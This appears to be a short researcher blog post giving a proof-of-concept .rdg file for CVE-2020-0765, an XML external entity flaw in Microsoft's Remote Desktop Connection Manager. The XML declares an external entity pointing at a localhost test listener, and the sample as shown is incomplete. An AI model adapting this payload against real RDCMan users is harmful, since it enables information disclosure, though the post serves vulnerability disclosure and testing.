Rafael Rivera

CVE-2020-0765: Quick proof of concept

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without considering DTD and entity handling, resulting in a bag of information disclosure (and denial of service) vulnerabilities. Here's a quick .rdg I put together to test against.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "http://localhost:11223/">

<RDCMan programVersion="2.7" schemaVersion="3">
<credentialsProfiles />
<connected />
<favorites />
<recentlyUsed />